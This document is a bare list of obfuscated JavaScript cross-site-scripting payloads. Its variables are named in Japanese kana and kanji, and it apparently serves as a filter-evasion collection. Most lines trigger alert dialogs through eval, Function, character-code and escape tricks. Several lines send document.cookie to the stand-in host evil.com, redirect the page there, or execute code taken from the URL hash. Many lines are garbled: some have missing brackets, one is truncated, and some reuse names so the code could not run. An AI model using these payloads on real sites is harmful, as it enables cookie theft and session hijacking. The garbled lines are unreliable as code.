あ=alert;あ(1);
あ='XSS';い=alert;い(あ);
な=+'',に=!な+な,ぬ=!に+な,ね=な+{},の=に[な++],は=に[ひ=な],ふ=++ひ+な,へ=ね[ひ+ふ],に[へ+=ね[な]+(に.ぬ+ね)[な]+ぬ[ふ]+の+は+に[ひ]+へ+の+ね[な]+は]へ();
た=document;ち=alert;ち(た.domain);
え=eval;は=String.fromCharCode;え(は(97,108,101,114,116,40,49,41));
闇=window;光=alert;闇.光('脆弱性確認');
さ="al",し="er",す="t",せ=さ+し+す;windowせ;
か="a",き="l",く="e",け="r",こ="t";windowか+き+く+け+こ;
風=window;雨=alert;風.雨('XSS');
エ=eval;ワ=String.fromCharCode;エ(ワ(97,108,101,114,116,40,49,41));
ま=+'',み=!ま+ま,む=!み+ま,め=ま+{},も=み[ま++],や=み[ひ=ま],ゆ=++ひ+ま,よ=め[ひ+ゆ];み[よ+=め[ま]+(み.む+め)[ま]+む[ゆ]+も+や+み[ひ]+よ+も+め[ま]+や]よ();
海=document;山=alert;山(海.cookie);
ら=setTimeout;り="あ=alert;あ(1)";ら(り,0);
黒='\u0061\u006c\u0065\u0072\u0074';白=window;白黒;
オ=Function;カ=String.fromCharCode;オ(カ(97,108,101,114,116,40,49,41))();
さ=['a','l','e','r','t'];し=さ.join('');windowし;
火=location;水=alert;if(火.hash){eval(火.hash.slice(1));}
テ=fetch;デ='evil.com?c='+btoa(document.cookie);テ(デ);
な=+'',に=!な+な;に[な++].constructor.constructor("alert(1)")();
光=window;闇=location;光.闇='evil.com';
あ=eval;い=String.fromCharCode;う=い(97,108,101,114,116);あ(う+'(1)');
え=document.body;い=innerHTML;え[い]='<img src=x onerror=alert(1)>';
ぬ=alert;ね='XSS';ぬ(ね);
ほ=window;へ='alert';ほへ;
つ=String.fromCharCode;て=eval;て(つ(97,108,101,114,116,40,49,41));
か=+'',き=!か+か;きか++;
み=document;む=alert;む(み.domain);
や=setTimeout;ゆ="ぬ=alert;ぬ(1)";や(ゆ,100);
れ='\u0061\u006c\u0065\u0072\u0074';ろ=window;ろれ;
わ=Function;を=String.fromCharCode;わ(を(97,108,101,114,116,40,49,41))();
ん=['a','l','e','r','t'];お=ん.join('');windowお;
く=location;け=alert;if(く.hash){Function(く.hash.slice(1))();}
こ=fetch;か='evil.com?d='+encodeURIComponent(document.cookie);こ(か);
し=+'',す=!し+し;す[し++].constructor.constructor("alert('XSS')")();
せ=window;そ=location;せ.そ.href='evil.com';
た=eval;ち=String.fromCharCode;つ=ち(97,108,101,114,116);た(つ+'(1)');
て=document.body;と=innerHTML;て[と]='<script>alert(1)</script>';
な=alert;に='test';な(に);
ぬ=window;ね='alert';ぬね;
の=String.fromCharCode;は=eval;は(の(97,108,101,114,116,40,49,41));
ひ=+'',ふ=!ひ+ひ;ふひ++;
へ=document;ほ=alert;ほ(へ.cookie);
ま=setTimeout;み="へ=alert;へ(1)";ま(み,0);
む='\u0061\u006c\u0065\u0072\u0074';め=window;めむ;
も=Function;や=String.fromCharCode;も(や(97,108,101,114,116,40,49,41))();
ゆ=['a','l','e','r','t'];よ=ゆ.join('');windowよ;
ら=location;り=alert;if(ら.hash){eval(ら.hash.slice(1));}
る=fetch;れ='evil.com?e='+btoa(document.domain);る(れ);
ろ=+'',わ=!ろ+わ;わ[ろ++].constructor.constructor("alert(1)")();
ん=window;お=location;ん.お='evil.com';
魑=alert;魅=魑;魅(1);
魍='\u0061\u006c\u0065\u0072\u0074';魎=window;魎魍;
鬼=+'',魂=!鬼+鬼,魄=!魂+鬼,妖=鬼+{},霊=魂[鬼++],神=魂[仙=鬼],仏=++仙+鬼,道=妖[仙+仏];魂[道+=妖[鬼]+(魂.魄+妖)[鬼]+魄[仏]+霊+神+魂[仙]+道+霊+妖[鬼]+神]道();
龍=eval;鳳=String.fromCharCode;龍(鳳(97,108,101,114,116,40,49,41));
陰='\u0058\u0053\u0053';陽=alert;陽(陰);
雷=location;電=alert;if(雷.hash){Function(unescape('%u0065%u0076%u0061%u006c')+雷.hash.slice(1))();}
嵐=window;風='a%u006c%u0065%u0072%u0074';嵐風;
雪=fetch;氷='evil.com?f='+btoa(document.cookie);雪(氷);
火=+'',水=!火+火;水[火++].constructor.constructor(atob('YWxlcnQoMSk='))();
土=Function;石=String.fromCharCode;土(石(97,108,101,114,116,40,49,41))();
金='\u0061\u006c\u0065\u0072\u0074';銀=window;銀金;
木=location;葉=alert;if(木.hash){eval(atob('ZXZhbA==')+木.hash.slice(1));}
花=fetch;実='evil.com?g='+encodeURIComponent(document.domain);花(実);
月=+'',星=!月+月;星[月++].constructor.constructor("alert(unescape('%u0031'))")();
日=window;夜=location;日.夜.href='evil.com';
山=eval;谷=String.fromCharCode;山(谷(97,108,101,114,116,40,49,41));
川=document.body;海=innerHTML;川[海]='<img src=x onerror=alert(atob('MQ=='))>';
湖=alert;池='test';湖(池);
泉=window;井='alert';泉井;
滝=String.fromCharCode;瀑=eval;瀑(滝(97,108,101,114,116,40,49,41));
霧=+'',霞=!霧+霞;霞霧++;
雲=document;雨=alert;雨(雲.cookie);
虹=setTimeout;彩="湖=alert;湖(1)";虹(彩,0);
星='\u0061\u006c\u0065\u0072\u0074';月=window;月星;
空=Function;天=String.fromCharCode;空(天(97,108,101,114,116,40,49,41))();
鳥=['a','l','e','r','t'];翼=鳥.join('');window翼;
魚=location;鰭=alert;if(魚.hash){eval(魚.hash.slice(1));}
獣=fetch;毛='evil.com?h='+btoa(document.cookie);獣(毛);
虫=+'',蝶=!虫+蝶;蝶[虫++].constructor.constructor("alert(1)")();
花=window;葉=location;花.葉='evil.com';
草=eval;根=String.fromCharCode;草(根(97,108,101,114,116,40,49,41));
樹=document.body;枝=innerHTML;樹[枝]='<script>alert(1)</script>';
森=alert;林='XSS';森(林);
竹=window;笹='alert';竹笹;
梅=String.fromCharCode;桜=eval;桜(梅(97,108,101,114,116,40,49,41));
桃=+'',李=!桃+李;李桃++;
杏=document;栗=alert;栗(杏.domain);
柿=setTimeout;橙="森=alert;森(1)";柿(橙,100);
葡萄='\u0061\u006c\u0065\u0072\u0074';梨=window;梨葡萄;
苺=Function;柑=String.fromCharCode;苺(柑(97,108,101,114,116,40,49,41))();
瓜=['a','l','e','r','t'];茄=瓜.join('');window茄;
玉=location;珠=alert;if(玉.hash){Function(玉.hash.slice(1))();}
宝=fetch;石='evil.com?i='+encodeURIComponent(document.cookie);宝(石);
珠=+'',玉=!珠+玉;玉[珠++].constructor.constructor("alert('XSS')")();
金=window;銀=location;金.銀.href='evil.com';
銅=eval;鉄=String.fromCharCode;銅(鉄(97,108,101,114,116,40,49,41));
鉛=document.body;錫=innerHTML;鉛[錫]='<img src=x onerror=alert(1)>';
亜=alert;欧='test';亜(欧);
米=window;州='alert';米州;
印=String.fromCharCode;度=eval;度(印(97,108,101,114,116,40,49,41));
あ='',い=!あ+あ,う=!い+あ,え=あ+{},お=い[あ++],か=い[き=あ],く=++き+あ,け=え[き+く],い[け+=え[あ]+(い.う+え)[あ]+う[く]+お+か+い[き]+け+お+え[あ]+か]け();
さ='',し=!さ+さ,す=!し+さ,せ=さ+{},そ=し[さ++],た=し[ち=さ],つ=++ち+さ,て=せ[ち+つ],し[て+=せ[さ]+(し.す+せ)[さ]+す[つ]+そ+た+し[ち]+て+そ+せ[さ]+た]て();
な='',に=!な+な,ぬ=!に+な,ね=な+{},の=に[な++],は=に[ひ=な],ふ=++ひ+な,へ=ね[ひ+ふ],に[へ+=ね[な]+(に.ぬ+ね)[な]+ぬ[ふ]+の+は+に[ひ]+へ+の+ね[な]+は]へ();
ま='',み=!ま+ま,む=!み+ま,め=ま+{},も=み[ま++],や=み[ゆ=ま],よ=++ゆ+ま,ら=め[ゆ+よ],み[ら+=め[ま]+(み.む+め)[ま]+む[よ]+も+や+み[ゆ]+ら+も+め[ま]+や]ら();
か='',き=!か+か,く=!き+か,け=か+{},こ=き[か++],さ=き[し=か],す=++し+か,せ=け[し+す],き[せ+=け[か]+(き.く+け)[か]+く[す]+こ+さ+き[し]+せ+こ+け[か]+さ]せ();
た='',ち=!た+た,つ=!ち+た,て=た+{},と=ち[た++],な=ち[に=た],ぬ=++に+た,ね=て[に+ぬ],ち[ね+=て[た]+(ち.つ+て)[た]+つ[ぬ]+と+な+ち[に]+ね+と+て[た]+な]ね();
は='',ひ=!は+は,ふ=!ひ+は,へ=は+{},ほ=ひ[は++],ま=ひ[み=は],む=++み+は,め=へ[み+む],ひ[め+=へ[は]+(ひ.ふ+へ)[は]+ふ[む]+ほ+ま+ひ[み]+め+ほ+へ[は]+ま]め();
や='',ゆ=!や+や,よ=!ゆ+や,ら=や+{},り=ゆ[や++],る=ゆ[れ=や],ろ=++れ+や,わ=ら[れ+ろ],ゆ[わ+=ら[や]+(ゆ.よ+ら)[や]+よ[ろ]+り+る+ゆ[れ]+わ+り+ら[や]+る]わ();
わ='',を=!わ+わ,ん=!を+わ,あ=わ+{},い=を[わ++],う=を[え=わ],お=++え+わ,か=あ[え+お],を[か+=あ[わ]+(を.ん+あ)[わ]+ん[お]+い+う+を[え]+か+い+あ[わ]+う][か](ん[わ]+ん[え]+を[お]+
桜花='\u0061\u006c\u0065\u0072\u0074';梅雨=window;梅雨桜花;
氵氵='',氵=!氵氵+氵氵,氵氵=!氵+氵氵,氵氵=氵氵+{},氵氵=氵[氵氵++],氵氵=氵[氵氵=氵氵],氵氵=++氵氵+氵氵,氵氵=氵氵[氵氵+氵氵],氵[氵氵+=氵氵[氵氵]+(氵.氵氵+氵氵)[氵氵]+氵氵[氵氵]+氵氵+氵氵+氵[氵氵]+氵氵+氵氵+氵氵[氵氵]+氵氵]氵氵();
龍鳳='',龍=!龍鳳+龍鳳,鳳=!龍+龍鳳,凰=龍鳳+{},龍鳳=龍[龍鳳++],龍=龍[凰=龍鳳],凰=++凰+龍鳳,龍鳳=凰[凰+凰],龍[龍鳳+=凰[龍鳳]+(龍.鳳+凰)[龍鳳]+鳳[凰]+龍鳳+龍+龍[凰]+龍鳳+龍鳳+凰[龍鳳]+龍]龍鳳();
陰陽=Function;陰='\u0061\u006c\u0065\u0072\u0074';陽=window;陰陽(陰+陽[陰])();
鬼神='',鬼=!鬼神+鬼神,神=!鬼+鬼神,妖=鬼神+{},鬼神=鬼[鬼神++],鬼=鬼[妖=鬼神],妖=++妖+鬼神,鬼神=妖[妖+妖],鬼[鬼神+=妖[鬼神]+(鬼.神+妖)[鬼神]+神[妖]+鬼神+鬼+鬼[妖]+鬼神+鬼神+妖[鬼神]+鬼]鬼神();
桜='\u0058\u0053\u0053';梅=alert;梅(桜);
陰陽=location;陰=alert;if(陰陽.hash){eval(atob('ZXZhbA==')+陰陽.hash.slice(1));}
龍='',鳳=!龍+龍,凰=!鳳+龍,龍=龍+{},鳳=鳳[龍++],凰=鳳[龍=龍],龍=++龍+龍,鳳=凰[龍+龍],鳳[鳳+=凰[龍]+(鳳.凰+凰)[龍]+凰[龍]+鳳+凰+鳳[龍]+鳳+鳳+凰[龍]+凰]鳳();
鬼='',神=!鬼+鬼,妖=!神+鬼,鬼=鬼+{},神=神[鬼++],妖=神[鬼=鬼],鬼=++鬼+鬼,神=妖[鬼+鬼],神[神+=妖[鬼]+(神.妖+妖)[鬼]+妖[鬼]+神+妖+神[鬼]+神+神+妖[鬼]+妖]神();
